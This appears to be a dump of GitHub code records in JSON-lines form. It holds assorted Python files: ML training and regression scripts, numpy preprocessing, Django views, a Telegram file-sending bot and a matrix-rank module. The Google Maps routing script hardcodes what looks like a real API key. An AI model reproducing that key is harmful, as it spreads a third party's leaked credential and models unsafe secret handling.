simulated_unlabeled_confidence_interval[total_displacement], \n confidence_interval, aug_simulated_model_MSE, epoch, val_name=\"Augmented validation set\")\n\n # Resamples the training set based on the performance of each class after each epoch\n dyna_sampler = dynamic_sampling(dyna_sampler, all_labels_train, all_preds_train)\n\n # Updates train_loader after resampling\n train_loader = DataLoader(train_dataset, batch_size=batch_size, sampler=dyna_sampler.weighted_random_sampler)\n \n images_trained += total_train\n epoch += 1\n\n\nprint('Finished Training')\n\nend_time = time.time()\ntotal_time = end_time - start_time\nprint('Total computation time: %.3f seconds' % total_time)\n\n# Calculate the number of mini-batches per epoch\nbatches_per_epoch = len(train_loader)\n\n# Plots the accuracy of the training, validation, and augmented validation sets as well as the loss values for each epoch.\ncreate_primary_plots(epoch, batches_per_epoch, loss_values, train_acc_values, val_acc_values, augmented_val_acc_values)\n\n# Plots the predicted accuracy (from the simulated unlabeled model) of validation and augmented validation sets after each epoch, and compares them to the actual accuracies.\nif run_unlabeled_set_simulation:\n 
create_unlabeled_set_simulation_plots(epoch, val_acc_values, augmented_val_acc_values, simulated_model_accuracy, simulated_model_CI_lo, \n simulated_model_CI_hi, simulated_model_MSE, aug_simulated_model_accuracy, aug_simulated_model_CI_lo, \n aug_simulated_model_CI_hi, aug_simulated_model_MSE)\n\nplt.tight_layout()\nplt.show()","repo_name":"goku206125/EARIN--Vehicle-Classification-from-Aerial-view-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12537897326","text":"# import regression models\r\nfrom sklearn.linear_model import LinearRegression\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport pandas as pd \r\nfrom sklearn.metrics import mean_absolute_error, mean_absolute_percentage_error\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n#preprocessing\r\n# car name(str), number of doors, length, horsepower, fuel type(str), safety rating\r\ndef branch_name_process(df, column):\r\n unique_branch = list(pd.unique(df[column]))\r\n for idx, branch_name in enumerate(unique_branch):\r\n # get index\r\n index = df.index[df[column] == branch_name].tolist()\r\n df.loc[index,column] = int(idx)\r\n return df\r\n\r\ndef convert_street_to_id(value):\r\n if value is None:\r\n return 0\r\n if value =='Ngõ 4 ô tô trở lên':\r\n return 1\r\n else:\r\n return 2\r\n\r\n# Workflow for building a linear regression model\r\n# step 1: choose which distinctive features to feed the prediction model\r\ndf = pd.read_csv(\"data\\Case_study_CarPrice_Assignment.csv\")\r\ndf['BranchName'] = df.apply(lambda x:str(x['CarName']).split(\" \")[0],axis=1).reset_index(drop=True)\r\n\r\n# use pandas' built-in tool (requirement: this column's data must stay fixed, never change)\r\ndf['BranchName'] = df['BranchName'].astype('category').cat.codes\r\n# tmp = df.corr()\r\n\r\n# print(tmp.head(1))\r\n\r\n# step 2: filter out noise (extremely important)\r\ntarget = df[['carwidth','curbweight','enginesize','citympg','highwaympg','BranchName', 'price']]\r\n# print(target.head(5))\r\n# carwidth,curbweight,enginesize,citympg,highwaympg,BranchName, price\r\n# boxplot , 6-7 sorted by values\r\n\r\n\r\n# step 3: normalize data \r\n\r\n# step 4: choose a model (overview, compare the models against each other: metrics)\r\n\r\n# linear, random forest, bootstrap\r\n# poly = PolynomialFeatures(degree=2, include_bias=False)\r\n\r\n\r\n# split the data\r\nX, y = target[['carwidth','curbweight','enginesize','citympg','highwaympg','BranchName']], df['price']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\r\nregressor = DecisionTreeRegressor(random_state=0)\r\nregressor.fit(X_train, y_train)\r\n\r\npred = regressor.predict(X_test)\r\nprint(\"MAPE: \",mean_absolute_percentage_error(y_test, pred))\r\n# metrics\r\n\r\n# step 5: fine-tune hyperparameters?? 
grid search, fine-tune the model's parameters \r\n# GridSearch has its own hyperparameters, which sometimes don't match the decision tree's, so this might not run; need to dig further into which hyperparameters it fits before experimenting\r\n\r\n# from sklearn.model_selection import GridSearchCV\r\n\r\n# param_grid = [\r\n# {'n_estimators': [3, 10], 'max_features': [2, 4, 6]},\r\n# {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]},\r\n# ]\r\n# grid_search = GridSearchCV(regressor, param_grid, cv=2,\r\n# scoring='neg_mean_squared_error',\r\n# refit=True)\r\n\r\n# grid_search.fit(X_train, y_train)\r\n\r\n# grid_search.best_params_.predict(X_test)\r\n# print(\"MAPE: \",mean_absolute_percentage_error(y_test, pred))\r\n\r\n","repo_name":"Phuocialy/Thuc_hanh_Phan_tich_du_lieu","sub_path":"gia_xe.py","file_name":"gia_xe.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38708393388","text":"\"\"\"\nEste archivo tiene como funcion almacenar rutas importantes que debe ser configuradas cuando se despliegue\nla aplicacion en la maquina virtual\n\"\"\"\n\nPATH_INV_EXCEL = \"C:\\\\Users\\\\compgraf\\\\Desktop\\\\Param.xlsm\"\nPATH_CODO_EXCEL = \"\\\"G:\\\\Unidades compartidas\\\\Computacion_Grafica_2020-II\\\\Modelacion_Codornices\\\\Alimentador_de_codornices\\\\Parametros\\\\ParametrosAlimentadora.xlsm\\\"\"\n\nHOJA_PARAM_INV = \"Hoja1\"\nHOJA_PARAM_CODO = \"Sheet1\"\n\nNOMBRE_MACRO_INV_EXCEL = \"Invernaderos\"\nNOMBRE_MACRO_CODO_EXCEL = \"runmacrocodornices\"\n\nCOTIZACIONES_PATH = \"\\\"G:\\\\Unidades compartidas\\\\Computacion_Grafica_2020-II\\\\Cotizaciones\\\"\"\nEXCEL_COTIZACION_PATH = \"C:\\\\Users\\\\compgraf\\\\Desktop\\\\Formato_Cotizacion.xlsx\"\n\nNOMBRE_INV_EXCEL = PATH_INV_EXCEL.split(\"\\\\\")[-1]\n# NOMBRE_CODO_EXCEL = PATH_CODO_EXCEL.split(\"\\\\\")[-1].replace(\"\\\"\")\nNOMBRE_CODO_EXCEL = \"ParametrosAlimentadora.xlsm\"","repo_name":"compugrafica20202/respuesta_automatica","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71362849401","text":"import numpy as np\nimport os\n\n\ndef center(data):\n '''Subtract the mean over all samples and pixels, independent by channel.\n\n Expects data of the form [batch, channel, height, width].'''\n means = data.mean(axis=(0, 2, 3), keepdims=True)\n data -= means\n return means\n\ndef scale(data, std=None, mode=\"standardize\"):\n '''Scale the data to the given std over all samples and pixels, independent\n by channel.\n\n Expects data of the form [batch, channel, height, width].'''\n \n if mode == \"standardize\":\n stds = data.std(axis=(0, 2, 3), keepdims=True)\n data /= stds/std\n return stds\n elif mode == \"normalize\":\n scale_min_max(data)\n else:\n raise NotImplementedError\n\ndef channelNeighbors(points, full, axes=(2, 3), condition=lambda x:True,\n stillbad = None):\n '''Create a list of orthogonal neighbors of each point that satisfy the given\n condition.\n\n return_val[i] = [(neighbor 1 index), (neighbor 2 index), ...] for points[i]\n\n Axes specifies the directions to explore for neighbors. For example,\n specifying axes=(2, 3) will hold the first 2 indices constant and only\n adjust the 2nd and 3rd indices.\n\n Condition is a function of the potential neighbor. For example it can test\n if the neighbor is nonzero. 
Any neighbor for which the condition returns\n True is included.\n \n Stillbad is an optional list to hold point indices that have no neighbors\n satisfying condition. If provided, it should be specified as an empty list.'''\n # adjust the condition to apply to the data at an index rather than at the\n # index itself (as filter() would normally assume)\n condition_full = lambda x:condition(full[x])\n shape = full.shape\n all_neighbors = []\n for point in points:\n point_neighbors = []\n for axis in axes:\n test_point_low = np.asarray(point)\n test_point_up = test_point_low.copy()\n if test_point_low[axis] > 0:\n test_point_low[axis] -= 1\n point_neighbors.append(tuple(test_point_low))\n if test_point_up[axis] < shape[axis] - 1:\n test_point_up[axis] += 1\n point_neighbors.append(tuple(test_point_up))\n # materialize the filter so it can be length-checked and stored (Python 3)\n good_neighbors = list(filter(condition_full, point_neighbors))\n if len(good_neighbors) == 0:\n if stillbad is not None:\n stillbad.append(point)\n all_neighbors.append(good_neighbors)\n return all_neighbors\n\ndef fix_time_zeros(data):\n # materialize the zip/filter iterators so they can be reused (Python 3)\n bads = list(zip(*np.nonzero(data == 0)))\n # Only take the time channels (not the charge channels)\n bads = list(filter(lambda x:x[1] in (1, 3), bads))\n\n\n # Get list of neighbors for each point\n # [[point 0 neighbors], [point 1 neighbors], ...]\n stillbad = []\n neighbors = channelNeighbors(bads, data, axes=(2, 3),\n condition=lambda x:x < 0, stillbad=stillbad)\n replacements = np.hstack([np.mean(data[tuple(zip(*ns))]) if len(ns) > 0 else 0 for ns in neighbors])\n data[tuple(zip(*bads))] = replacements\n iterations = 0\n while len(stillbad) > 0 and iterations < 3:\n iterations += 1\n bads = stillbad\n stillbad = []\n neighbors = channelNeighbors(bads, data, axes=(2, 3),\n condition=lambda x:x < 0, stillbad=stillbad)\n replacements = np.hstack([np.mean(data[tuple(zip(*ns))]) if len(ns) > 0 else 0 for ns in neighbors])\n data[tuple(zip(*bads))] = replacements\n \ndef scale_min_max(data, min_=-1, max_=1, mins=None,maxes=None):\n '''scales data to be between min and max in place'''\n if mins is None or maxes is None:\n mins = data.min(axis=(0, 2, 3), keepdims=True)\n maxes = data.max(axis=(0, 2, 3), keepdims=True)\n\n #data = (max_ - min_) * ((data - mins) / (maxes - mins)) + min_\n #in place\n data -= mins\n data /= (maxes-mins)\n data *= max_ - min_\n data += min_\n return (mins, maxes)\n \ndef filter_out_zeros(X,y):\n \n #get indices of all rows that don't contain all zeroes\n nonzero_rows = ~np.all(X[:, : ]==0., axis=1)\n \n #filter for these nonzero rows\n X = X[nonzero_rows]\n y = y[nonzero_rows]\n return X,y\n\ndef get_equal_per_class(X,y, nclass):\n# #get the number of rows in X that correspond to a y for each given class, then take the class that \n# #corresponds to the fewest rows in X\n# min_classes = [X[y == float(cl)].shape[0] for cl in range(nclass)]\n# print min_classes\n# min_class_count = min(min_classes)\n# #get min_class_count rows of X for each corresponding class\n# print y.shape\n# X = np.vstack(tuple([X[y == float(cl)][:min_class_count, :] for cl in range(nclass)]))\n# y = np.vstack(tuple([y[y == float(cl)][:min_class_count] for cl in range(nclass)]))\n# print y.shape\n \n return X,y\n\n","repo_name":"NERSC/dayabay-learn","sub_path":"networks/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36192853338","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\n\nfrom blog_app.permissions import 
CommentPermission\nfrom .serializers import CommentSerializer, ReplySerializer\nfrom .models import Comment, Reply\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n permission_classes = [CommentPermission]\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ReplyViewSet(viewsets.ModelViewSet):\n permission_classes = [CommentPermission]\n queryset = Reply.objects.all()\n serializer_class = ReplySerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n","repo_name":"mom4ilakis/Internship-Nemetschek","sub_path":"Web/Blog/blog/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45286325860","text":"import numpy as np \nfrom helper import *\n'''\nHomework2: logistic regression classifier\n'''\n\n\ndef sigmoid(z):\n '''\n Computes the sigmoid activation function\n\n :param z: numpy array\n :return: The sigmoid value of z\n '''\n return 1 / (1 + np.exp(-z))\n\ndef logistic_regression(data, label, max_iter, learning_rate):\n '''\n The logistic regression classifier function.\n\n Args:\n data: train data with shape (1561, 3), which means 1561 samples and\n each sample has 3 features.(1, symmetry, average intensity)\n label: train data's label with shape (1561,1).\n 1 for digit number 1 and -1 for digit number 5.\n max_iter: max iteration numbers\n learning_rate: learning rate for weight update\n\n Returns:\n w: the separator with shape (3, 1). You must initialize it with w = np.zeros((d,1))\n '''\n w = np.zeros((data.shape[1], 1))\n for current_epoch in range(max_iter):\n v_t = np.zeros((data.shape[1],1))\n for (xi, yi) in zip(data, label):\n xi = xi.reshape((data.shape[1],1))\n v_t += yi * xi * sigmoid(-yi * w.T.dot(xi))\n v_t /= len(label)\n w = w + v_t * learning_rate\n return w\n\ndef thirdorder(data):\n '''\n This function is used for a 3rd order polynomial transform of the data.\n Args:\n data: input data with shape (:, 3) the first dimension represents\n total samples (training: 1561; testing: 424) and the\n second dimension represents total features.\n\n Return:\n result: A numpy array format new data with shape (:,10), which using\n a 3rd order polynomial transformation to extend the feature numbers\n from 3 to 10.\n The first dimension represents total samples (training: 1561; testing: 424)\n and the second dimension represents total features.\n '''\n degree = 3\n output = np.ones((data.shape[0], 1))\n x1 = data[:, 0]\n x2 = data[:, 1]\n for i in range(1, degree + 1):\n for j in range(0, i + 1):\n col = (x1 ** (i - j)) * (x2 ** j)\n col = col.reshape(col.shape[0], 1)\n output = np.append(output, col, axis = 1)\n return output\n\n\ndef accuracy(x, y, w):\n '''\n This function is used to compute accuracy of a logistic regression model.\n \n Args:\n x: input data with shape (n, d), where n represents total data samples and d represents\n total feature numbers of a certain data sample.\n y: corresponding label of x with shape(n, 1), where n represents total data samples.\n w: the separator learnt from logistic regression function with shape (d, 1),\n where d represents total feature numbers of a certain data sample.\n\n Return \n accuracy: total percentage of correctly classified samples. 
Set the threshold as 0.5,\n which means, if the predicted probability > 0.5, classify as 1; Otherwise, classify as -1.\n '''\n activation = sigmoid(np.dot(x,w))\n predictions = np.where(activation > 0.5, 1, -1)\n y = y.reshape((y.shape[0], 1))\n return np.mean(predictions == y)\n\n","repo_name":"sergiovasquez122/CECS-456","sub_path":"HW2/code/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20724099801","text":"import pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nimport googlemaps\nimport itertools\n\ndef create_matrices(addresses, pickups, deliveries):\n maps = googlemaps.Client(key = 'AIzaSyAlrj1tmPvPqtWOixqSEOiydRyKyZiBHjo')\n \n addList = addresses.to_numpy()\n #addList = np.array(addresses)\n total = len(addList)\n\n order = np.arange(0, total, 1)\n \n #a, b = zip(*list(itertools.product(range(total), range(total))))\n #a, b = np.array(a), np.array(b)\n \n weights = np.zeros(shape=(total, total))\n times = np.zeros(shape=(total, total))\n dists = np.zeros(shape=(total, total))\n\n for i in range(total):\n for j in range(total):\n result = maps.distance_matrix(addList[i], addList[j])\n dist = result['rows'][0]['elements'][0]['distance']['text']\n dist = \" \".join(dist.split(\" \")[:-1])\n dist = dist.replace(\",\", \"\")\n dist = float(dist)\n \n time = result['rows'][0]['elements'][0]['duration']['text']\n time = \" \".join(time.split(\" \")[:-1])\n time = time.split(\" hour\")\n \n #time = time.replace(\",\", \"\")\n if len(time) > 1:\n time[1] = time[1].split(\" \")[1]\n time = float(time[0]) + (float(time[1]) / 60)\n else:\n time = float(time[0])\n \n weights[i, j] = dist / (max(pickups.iloc[j, 0], deliveries.iloc[j, 0]) + .1)\n times[i, j] = time\n dists[i, j] = dist\n\n #np.add.at(weights, (a, b), float(\" \".join(maps.distance_matrix(addList[a], addList[b])['rows'][0]['elements'][0]['distance']['text'].split(\" \")[:-1])))\n \n return(weights, times, dists)\n \n\n","repo_name":"mcowart3/routing","sub_path":"create_matrices.py","file_name":"create_matrices.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1189239167","text":"import os\nimport logging\nimport time\nfrom datetime import datetime\n\nfrom pyrogram import Client, filters, idle\nfrom config import Config\nfrom func import modify_caption_to_filename, rename, file_caption, file_captions, file_caption_entities, send_caption_entities\nfrom progress import progress_bar, download_progress_bar\n\n# logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\nbot = Client(\"bot\",\n bot_token=Config.BOT_TOKEN,\n api_id=Config.API_ID,\n api_hash=Config.API_HASH)\nbot.start()\nme = bot.get_me()\nprint(f\"Successfully deployed @{me.username}\")\nstart_time = time.time()\n\n\n@bot.on_message(filters.command(\"start\") & filters.private & filters.incoming)\nasync def start(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID or chat_id == Config.ACG_ID or chat_id == Config.C_ID:\n print(f\"User_id : {chat_id} ; User_name : {m.from_user.first_name} {m.from_user.last_name}\")\n await m.reply_text(f\"HI {m.from_user.first_name}😌\\nWhat would you like to do \"\n f\"today?\\n**/sendseries\\nOR\\n/sendmovies**\")\n else:\n print(f\"User_id : 
{chat_id} ; User_name : {m.from_user.first_name} {m.from_user.last_name}\")\n await m.reply(f\"HI {m.from_user.first_name}\\nI don't know you 🙁\\nOops.. I know your name now😅\")\n\n\n@bot.on_message(filters.command(\"help\") & filters.private & filters.incoming)\nasync def get_help(c, m):\n await m.reply(f'**GO ASK GOOGLE**')\n\n\n@bot.on_message(filters.command(\"sendseries\") & filters.private & filters.incoming)\nasync def send_series(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.ACG_ID:\n path = Config.PATH_ACGSERIES\n os.chdir(path)\n for folder in os.listdir():\n new_path = os.path.join(path + '\\\\' + folder)\n os.chdir(new_path)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=f\"{Config.STICKER}{folder}.webp\")\n # await bot.send_sticker(chat_id=m.from_user.id, sticker=f\"{Config.STICKER}1.webp\")\n for file in os.listdir():\n file_name, file_ext = os.path.splitext(file)\n newname = rename(file_name) + file_ext\n os.rename(file, newname)\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... {f} {current_time}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n # caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_ACGSERIES,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message))\n await bot.delete_messages(Config.chat_id, Config.message_id)\n # print(f\"Message Deleted Chat id : {Config.chat_id} Message id : {Config.message_id}\")\n os.chdir(new_path)\n os.remove(f)\n os.chdir(path)\n os.rmdir(folder)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"end.webp\")\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n else:\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message(filters.command(\"sendmovies\") & filters.private & filters.incoming)\nasync def send_movies(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.ACG_ID:\n os.chdir(Config.PATH_ACGMOVIES)\n for file in os.listdir():\n file_name, file_ext = os.path.splitext(file)\n newname = rename(file_name) + file_ext\n os.rename(file, newname)\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... {f} {current_time}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n # caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_ACGMOVIES,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message)\n )\n await bot.delete_messages(Config.chat_id, Config.message_id)\n # print(f\"Message Deleted Chat id : {Config.chat_id} Message id : {Config.message_id}\")\n os.remove(f)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message(filters.command(\"nptel\") & filters.private & filters.incoming)\nasync def send_nptel(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID:\n path = Config.PATH_NPTEL\n os.chdir(path)\n for folder in os.listdir():\n new_path = os.path.join(path + '\\\\' + folder)\n os.chdir(new_path)\n await bot.send_photo(\n chat_id=m.chat.id,\n photo=Config.THUMB_NPTEL,\n caption=file_caption(folder)\n )\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... 
{f}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_NPTEL,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message))\n await bot.delete_messages(int(Config.chat_id), int(Config.message_id))\n os.remove(f)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message((filters.command(\"download\") | filters.document | filters.video) & filters.private & filters.incoming)\nasync def download(c, m):\n if m.text == \"/download\":\n await m.reply_text(\"Send Files to Download\")\n elif not m.caption:\n print(f\"{m.document.file_name}\\t already Exist\")\n else:\n os.chdir(Config.DOWNLOAD_PATH)\n filename = m.document.file_name\n file_name, file_ext = os.path.splitext(filename)\n newname = modify_caption_to_filename(m.caption, file_ext)\n if newname in os.listdir():\n print(f\"{newname} already Exist\")\n elif filename in os.listdir():\n os.rename(filename, newname)\n print(f\"{filename}\\nRenamed to \\n{newname}\")\n else:\n await m.reply(f\"{newname}\\n**Doesn't Exist**\")\n \"\"\"\n print(f\"Downloading file... {filename}\")\n send_message = await m.reply_text(f\"**Downloading File**\\n{filename}\")\n path = f\"{Config.DOWNLOAD_PATH}\\\\{filename}\"\n await m.download(\n file_name=path,\n progress=download_progress_bar,\n progress_args=(\"Downloading:\", start_time, send_message))\n await bot.delete_messages(int(Config.down_chat_id), int(Config.down_message_id))\n # print(f\"Message Deleted Chat id : {Config.down_chat_id} Message id : {Config.down_message_id}\")\n os.rename(filename, newname)\n await m.reply(f\"{newname}\\n**Downloaded**\")\n \"\"\"\n\n\n@bot.on_message(filters.photo & filters.private & filters.incoming)\nasync def photo(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID or chat_id == Config.ACG_ID or chat_id == Config.C_ID:\n if m.caption:\n await bot.send_photo(\n chat_id=m.chat.id,\n photo=m.photo.file_id,\n caption=file_captions(m.caption),\n caption_entities= m.caption_entities,\n # caption_entities=file_caption_entities(m.caption, m.caption_entities),\n reply_markup=m.reply_markup\n )\n await m.reply(Config.acg_caption)\n\n\nif idle():\n bot.stop()\n print(\"Ok bye 😢.\")\n","repo_name":"angelogoves/Telegram_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4567168938","text":"'''\nCreate a test class\n\n\nTest classes are containers inside test modules. They help separate tests for different functions within the test module, and serve as a structuring tool in the pytest framework.\n\nTest classes are written in CamelCase e.g. TestMyFunction as opposed to tests, which are written using underscores e.g. test_something().\n\nYou met the function split_into_training_and_testing_sets() in Chapter 2, and wrote some tests for it. One of these tests was called test_on_one_row() and it checked if the function raises a ValueError when passed a NumPy array with only one row.\n\nIn this exercise you are going to create a test class for this function. 
This test class will hold the test test_on_one_row().\n\nInstructions\n100 XP\n\n- Declare the test class for the function split_into_training_and_testing_sets(), making sure to give it a name that follows the standard naming convention.\n- Fill in the mandatory argument in the test test_on_one_row().\n\n'''\nimport pytest\nimport numpy as np\n\nfrom models.train import split_into_training_and_testing_sets\n\n# Declare the test class\n\n\nclass TestSplitIntoTrainingAndTestingSets(object):\n # Fill in with the correct mandatory argument\n def test_on_one_row(self):\n test_argument = np.array([[1382.0, 390167.0]])\n with pytest.raises(ValueError) as exc_info:\n split_into_training_and_testing_sets(test_argument)\n expected_error_msg = \"Argument data_array must have at least 2 rows, it actually has just 1\"\n assert exc_info.match(expected_error_msg)\n","repo_name":"chandrainf/Datacamp","sub_path":"Data Engineer with Python Track/09. Unit Testing for Data Science in Python/Chapter/03. Test Organization and Execution/02-Create a test class.py","file_name":"02-Create a test class.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"30960079723","text":"#!/usr/bin/env python3\n\nfrom src.operations import *\nfrom src.properties import *\nfrom src.vectors import *\nfrom tests.helper import *\nfrom m4cs.adjugate_matrices import *\nfrom m4cs.matrix_inversion import *\nfrom m4cs.orthogonal_matrices import is_singular\nfrom copy import deepcopy\n\n#### MATRIX RANK #### \n\n# thanks to user chiron on stackoverflow for these three functions\ndef ContinSubSeq(lst):\n size = lst\n ret = []\n for start in range(size):\n for end in range(start+1,size+1):\n ret.append([start, end])\n return ret\n\ndef submatrix_range(a, rows, cols):\n # as with the other submatrix function - make a copy to avoid touching master\n a = deepcopy(a)\n \n # get each value from input\n start_row, end_row = rows\n start_col, end_col = cols\n\n # make the end vals exclusive\n end_row += 1\n end_col += 1\n\n # combine these and make them into indices\n rows = slice(start_row, end_row)\n cols = slice(start_col, end_col)\n\n\n # reverse the lists to avoid problems associated with indices/list changes\n # rows.reverse()\n # cols.reverse()\n\n # i could use list slices - i dont understand why a[0:len(a)+1] works!\n \"\"\"\n for row in rows:\n a.pop(row)\n \"\"\"\n a = a[rows]\n ret = list(map(lambda x: x[cols], a))\n\n return ret\n\ndef get_submatrices(a, square=False):\n m, n = dimensions(a)\n ret = []\n\n # get the submatrices\n for start_row, end_row in ContinSubSeq(m):\n for start_col, end_col in ContinSubSeq(n):\n ret.append(submatrix_range(a, [start_row, end_row], [start_col, end_col]))\n\n # if square, filter out any mxn matrices - return this\n if square:\n return list(filter(lambda x: is_square(x), ret))\n\n return ret\n\ndef rank(a):\n rankmatrix = []\n submatrices = get_submatrices(a, square=True)\n non_singular_matrices = list(filter(lambda x: is_singular(x) == False, submatrices))\n\n largest_singular_matrix = []\n for matrix in non_singular_matrices:\n if dimensions(matrix)[0] > dimensions(largest_singular_matrix)[0]:\n largest_singular_matrix = matrix\n\n return len(largest_singular_matrix), largest_singular_matrix\n \n\ndef linearly_independent_rows(a):\n # get number of linearly independent rows\n ret = 0\n for i, row in enumerate(a):\n row_sum = [0] * len(row)\n # get the sum of rows - current row\n for j, second_row 
in enumerate(a):\n if j != i:\n row_sum = add_vectors(row_sum, second_row)\n if row_sum != row:\n ret += 1\n return ret\n\n# the number of linearly independent rows in a == rank(a)\ndef rank_linear_dependency(a):\n return linearly_independent_rows(a) == rank(a)[0]\n\n# let a = non-singular and pb be the rank of the matrix B. the rank of AB == pb\ndef sylvesters_lemma(a, b):\n return rank(matrix_multiplication(a, b)) == rank(b)\n\n","repo_name":"benchungiscool/pymatrix","sub_path":"m4cs/matrix_rank.py","file_name":"matrix_rank.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13985886515","text":"# https://www.acmicpc.net/problem/15652\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\n\ndef answer(n, m, array):\n if n == M:\n print(*array)\n return\n\n for i in range(m, N+1):\n answer(n + 1, i, array + [i])\n\nanswer(0, 1, [])","repo_name":"WChan1027/Problem","sub_path":"Baekjoon/Silver/15652. N과 M (4).py","file_name":"15652. N과 M (4).py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30529561517","text":"\"\"\"\nAdd Two Numbers\n@ Attention: 1. do not forget the last carry 2. do not forget the left linked list.\n\"\"\"\n\n\nclass Solution(object):\n def addTwoNumbers(self, p1, p2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head = ListNode(0)\n tmp = head\n flag = 0\n while p1 and p2:\n val = flag + p1.val + p2.val\n if val >= 10:\n val -= 10\n flag = 1\n else:\n flag = 0\n tmp.next = ListNode(val)\n tmp = tmp.next\n p1 = p1.next\n p2 = p2.next\n if p1:\n tmp, flag = self.tail(p1, flag, tmp)\n elif p2:\n tmp, flag = self.tail(p2, flag, tmp)\n if flag:\n tmp.next = ListNode(1)\n return head.next\n\n def tail(self, p1, flag, tmp):\n while p1:\n val = flag + p1.val\n if val >= 10:\n val -= 10\n flag = 1\n else:\n flag = 0\n tmp.next = ListNode(val)\n tmp = tmp.next\n p1 = p1.next\n return tmp, flag\n\n","repo_name":"wttttt-wang/leetcode_withTopics","sub_path":"LinkedList/add-two-numbers.py","file_name":"add-two-numbers.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4527440326","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Submit ZeoppMultistageDdecWorkChain for H2O\"\"\"\n\nimport os\nimport click\n\nfrom aiida.engine import run\nfrom aiida.plugins import DataFactory, WorkflowFactory\nfrom aiida.orm import Dict, Str\nfrom aiida import cmdline\n\n# Workchain objects\nZeoppMultistageDdecWorkChain = WorkflowFactory('lsmo.zeopp_multistage_ddec') # pylint: disable=invalid-name\n\n#Data objects\nCifData = DataFactory('cif') # pylint: disable=invalid-name\nNetworkParameters = DataFactory('zeopp.parameters') # pylint: disable=invalid-name\n\n\n@click.command('cli')\n@cmdline.utils.decorators.with_dbenv()\n@click.option('--zeopp_code', type=cmdline.params.types.CodeParamType())\n@click.option('--cp2k_code', 